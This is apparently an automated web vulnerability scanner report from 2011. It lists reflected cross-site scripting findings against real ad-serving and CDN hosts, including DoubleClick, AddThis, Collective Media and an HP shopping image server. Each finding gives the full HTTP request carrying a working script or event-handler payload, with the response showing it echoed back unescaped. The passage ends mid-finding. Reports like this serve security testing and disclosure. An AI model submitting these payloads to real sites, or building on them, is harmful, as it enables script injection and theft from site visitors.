The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 391e9<script>alert(1)</script>eef04129dd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad391e9<script>alert(1)</script>eef04129dd8/cm.womensforum/;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea; apnx=1; qcms=1; blue=1; qcdp=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 109
Vary: Accept-Encoding
Date: Mon, 21 Mar 2011 16:42:20 GMT
Connection: close

unknown path /ad391e9<script>alert(1)</script>eef04129dd8/cm.womensforum/;cmw=nurl;sz=300x250;ord=[timestamp]

2.2. http://a.collective-media.net/adj/cm.womensforum/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.womensforum/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1efd'-alert(1)-'8d9eb29ee9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.womensforuma1efd'-alert(1)-'8d9eb29ee9e/;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dc-dal-sea; nadp=1

Response

2.3. http://a.collective-media.net/adj/cm.womensforum/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.womensforum/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f1df'-alert(1)-'204eaf911aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.womensforum/;sz=300x250;ord=[timestamp]?&5f1df'-alert(1)-'204eaf911aa=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dc-dal-sea; nadp=1

Response

2.4. http://a.collective-media.net/adj/cm.womensforum/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.womensforum/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a7a4'-alert(1)-'20446aa2bef was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.womensforum/;sz=300x250;ord=[timestamp]?6a7a4'-alert(1)-'20446aa2bef HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dc-dal-sea; nadp=1

Response

2.5. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_adid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa0b8'-alert(1)-'bbb88df9624 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=111028&mt_adid=70fa0b8'-alert(1)-'bbb88df9624&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=289486387836241043? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS8yODk0ODYzODc4MzYyNDEwNDMvMTExMDI4LzEwMjA2NS80L1FpNE5WRVpOUmx2MjcwYWJJRGVPaThVR2tLTnBmMm04aXdHNWd2bFlZTzQv/S5DqKfb0U04qSVQrVHxBGmAg2tY&price=TYd_kgAMfgYK7F2ujd1UXWXL3r8sYmz3BjlDzA&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYVO4kn-HTYb8Ma67sQfdqPXuCNzvj_EB-PbyvBGYxoOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi05MDg4NzA5NjM3MjIwNzU0oAHg6pnsA7IBEHd3dy5oaWdoYmVhbS5jb226AQozMDB4MjUwX2FzyAEJ2gEraHR0cDovL3d3dy5oaWdoYmVhbS5jb20vZG9jLzFQMi02NzU0NTEuaHRtbJgC1BvAAgTIAtbBjA6oAwHoA_MC6AOnKugDMOgD8gj1AwIAAMSABobUv9ePuYOH5gE%26num%3D1%26sig%3DAGiWqtwK2XfHocO67hbG3op5axhOhLNNCw%26client%3Dca-pub-9088709637220754%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 21 Mar 2011 16:41:38 GMT
Vary: Accept-Encoding
Expires: Mon, 21 Mar 2011 16:41:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 521

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad1/c/a7/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=111028&mt_adid=70fa0b8'-alert(1)-'bbb88df9624&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

2.6. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2827e'-alert(1)-'3484de62477 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=1110282827e'-alert(1)-'3484de62477&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=289486387836241043? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS8yODk0ODYzODc4MzYyNDEwNDMvMTExMDI4LzEwMjA2NS80L1FpNE5WRVpOUmx2MjcwYWJJRGVPaThVR2tLTnBmMm04aXdHNWd2bFlZTzQv/S5DqKfb0U04qSVQrVHxBGmAg2tY&price=TYd_kgAMfgYK7F2ujd1UXWXL3r8sYmz3BjlDzA&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYVO4kn-HTYb8Ma67sQfdqPXuCNzvj_EB-PbyvBGYxoOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi05MDg4NzA5NjM3MjIwNzU0oAHg6pnsA7IBEHd3dy5oaWdoYmVhbS5jb226AQozMDB4MjUwX2FzyAEJ2gEraHR0cDovL3d3dy5oaWdoYmVhbS5jb20vZG9jLzFQMi02NzU0NTEuaHRtbJgC1BvAAgTIAtbBjA6oAwHoA_MC6AOnKugDMOgD8gj1AwIAAMSABobUv9ePuYOH5gE%26num%3D1%26sig%3DAGiWqtwK2XfHocO67hbG3op5axhOhLNNCw%26client%3Dca-pub-9088709637220754%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 21 Mar 2011 16:41:33 GMT
Vary: Accept-Encoding
Expires: Mon, 21 Mar 2011 16:41:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 521

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad1/c/a7/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=1110282827e'-alert(1)-'3484de62477&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

2.7. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_uuid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0dc7'-alert(1)-'99a6df77328 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf0dc7'-alert(1)-'99a6df77328&redirect=;ord=289486387836241043? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS8yODk0ODYzODc4MzYyNDEwNDMvMTExMDI4LzEwMjA2NS80L1FpNE5WRVpOUmx2MjcwYWJJRGVPaThVR2tLTnBmMm04aXdHNWd2bFlZTzQv/S5DqKfb0U04qSVQrVHxBGmAg2tY&price=TYd_kgAMfgYK7F2ujd1UXWXL3r8sYmz3BjlDzA&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYVO4kn-HTYb8Ma67sQfdqPXuCNzvj_EB-PbyvBGYxoOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi05MDg4NzA5NjM3MjIwNzU0oAHg6pnsA7IBEHd3dy5oaWdoYmVhbS5jb226AQozMDB4MjUwX2FzyAEJ2gEraHR0cDovL3d3dy5oaWdoYmVhbS5jb20vZG9jLzFQMi02NzU0NTEuaHRtbJgC1BvAAgTIAtbBjA6oAwHoA_MC6AOnKugDMOgD8gj1AwIAAMSABobUv9ePuYOH5gE%26num%3D1%26sig%3DAGiWqtwK2XfHocO67hbG3op5axhOhLNNCw%26client%3Dca-pub-9088709637220754%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 21 Mar 2011 16:41:42 GMT
Vary: Accept-Encoding
Expires: Mon, 21 Mar 2011 16:41:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 521

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad1/c/a7/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf0dc7'-alert(1)-'99a6df77328&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

2.8. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405c5'-alert(1)-'9f269d73aff was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=405c5'-alert(1)-'9f269d73aff HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS8yODk0ODYzODc4MzYyNDEwNDMvMTExMDI4LzEwMjA2NS80L1FpNE5WRVpOUmx2MjcwYWJJRGVPaThVR2tLTnBmMm04aXdHNWd2bFlZTzQv/S5DqKfb0U04qSVQrVHxBGmAg2tY&price=TYd_kgAMfgYK7F2ujd1UXWXL3r8sYmz3BjlDzA&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYVO4kn-HTYb8Ma67sQfdqPXuCNzvj_EB-PbyvBGYxoOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi05MDg4NzA5NjM3MjIwNzU0oAHg6pnsA7IBEHd3dy5oaWdoYmVhbS5jb226AQozMDB4MjUwX2FzyAEJ2gEraHR0cDovL3d3dy5oaWdoYmVhbS5jb20vZG9jLzFQMi02NzU0NTEuaHRtbJgC1BvAAgTIAtbBjA6oAwHoA_MC6AOnKugDMOgD8gj1AwIAAMSABobUv9ePuYOH5gE%26num%3D1%26sig%3DAGiWqtwK2XfHocO67hbG3op5axhOhLNNCw%26client%3Dca-pub-9088709637220754%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 521
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 21 Mar 2011 16:41:46 GMT
Expires: Mon, 21 Mar 2011 16:41:46 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad1/c/a7/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=289486387836241043&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=405c5'-alert(1)-'9f269d73affhttps%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

2.9. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0686'-alert(1)-'eb5f497ce0b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=289486387836241043c0686'-alert(1)-'eb5f497ce0b&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=289486387836241043? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS8yODk0ODYzODc4MzYyNDEwNDMvMTExMDI4LzEwMjA2NS80L1FpNE5WRVpOUmx2MjcwYWJJRGVPaThVR2tLTnBmMm04aXdHNWd2bFlZTzQv/S5DqKfb0U04qSVQrVHxBGmAg2tY&price=TYd_kgAMfgYK7F2ujd1UXWXL3r8sYmz3BjlDzA&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYVO4kn-HTYb8Ma67sQfdqPXuCNzvj_EB-PbyvBGYxoOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi05MDg4NzA5NjM3MjIwNzU0oAHg6pnsA7IBEHd3dy5oaWdoYmVhbS5jb226AQozMDB4MjUwX2FzyAEJ2gEraHR0cDovL3d3dy5oaWdoYmVhbS5jb20vZG9jLzFQMi02NzU0NTEuaHRtbJgC1BvAAgTIAtbBjA6oAwHoA_MC6AOnKugDMOgD8gj1AwIAAMSABobUv9ePuYOH5gE%26num%3D1%26sig%3DAGiWqtwK2XfHocO67hbG3op5axhOhLNNCw%26client%3Dca-pub-9088709637220754%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 21 Mar 2011 16:41:29 GMT
Vary: Accept-Encoding
Expires: Mon, 21 Mar 2011 16:41:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 521

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad1/c/a7/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=289486387836241043c0686'-alert(1)-'eb5f497ce0b&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

2.10. http://ds.addthis.com/red/psi/sites/www.icfi.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.icfi.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 169b9<script>alert(1)</script>aa7e325d484 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.icfi.com/p.json?callback=_ate.ad.hpr169b9<script>alert(1)</script>aa7e325d484&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.icfi.com%2Fnews%2F2011%2Ficf-takes-best-advisory-consultancy-award-in-voluntary-carbon-market-survey&8jelue HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh35.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300642103.1FE|1300642103.60|1299801259.19A|1300446510.66; dt=X; psc=4; uid=4d5af32c71c2e1a5; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 21 Mar 2011 16:30:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 20 Apr 2011 16:30:32 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 21 Mar 2011 16:30:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 21 Mar 2011 16:30:32 GMT
Connection: close

_ate.ad.hpr169b9<script>alert(1)</script>aa7e325d484({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.11. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$bg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $bg request parameter is copied into the HTML document as plain text between tags. The payload 95d17<img%20src%3da%20onerror%3dalert(1)>6548231a221 was submitted in the $bg parameter. This input was echoed as 95d17<img src=a onerror=alert(1)>6548231a221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$bg=HPShopping%2Fwbg395d17<img%20src%3da%20onerror%3dalert(1)>6548231a221&$dt=is%7BHPShopping%2F%7D&$mon=is%7BHPShopping%2F%7D&$fti=is%7BHPShopping%2Fls022av%5F01%5F10%7D&$ftc=HP%20Pavilion%20p6680t&$bdc2=&$hlc2=&$bdc1=Save%20%24320%20including%201GB%20discrete%20graphics%2C%20free%20upgrade%20to%206GB%20of%20memory%20and%201TB%20hard%20drive%2C%20free%20shipping&$hlc1=&$hdl1=Entertainment%20center&$hdl2= HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=landing&landing=desktops
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Mon, 21 Mar 2011 15:50:11 GMT
Date: Mon, 21 Mar 2011 15:50:11 GMT
Connection: close

Unable to find /HPShopping/HPShopping/wbg395d17<img src=a onerror=alert(1)>6548231a221

2.12. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$dt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hpshopping.speedera.net
Path:	/s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $dt request parameter is copied into the HTML document as plain text between tags. The payload 34e5f<img%20src%3da%20onerror%3dalert(1)>5a3994af565 was submitted in the $dt parameter. This input was echoed as 34e5f<img src=a onerror=alert(1)>5a3994af565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

